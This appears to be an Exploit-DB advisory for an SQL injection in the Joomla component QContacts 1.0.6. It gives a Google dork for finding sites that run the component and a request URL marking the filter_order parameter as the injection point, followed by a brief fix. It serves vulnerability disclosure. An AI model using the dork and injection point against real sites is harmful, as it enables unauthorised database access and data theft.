Joomla! Component com_qcontacts 1.0.6 - SQL Injection

Author: Don
type: webapps
platform: php
port: 
date_added: 2011-12-08 
date_updated: 2016-11-02 
verified: 0 
codes: OSVDB-77723 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcom_qcontacts_106.zip

############################################################################
# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*
# Google Dork: inurl:"/components/com_qcontacts/"
# Date: Decembar/08/2011
# Author: Don (BalcanCrew & BalcanHack)
# Software Link: *
http://www.latenight-coding.com/joomla-addons/qcontacts.html*
# Version: 1.0.6
# Tested on: Apache
############################################################################

Vulnerability:
This vulnerability affects /index.php

*
/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
*


How to fix this vulnerability:
*Filter metacharacters from user input.*

*~Don 2011*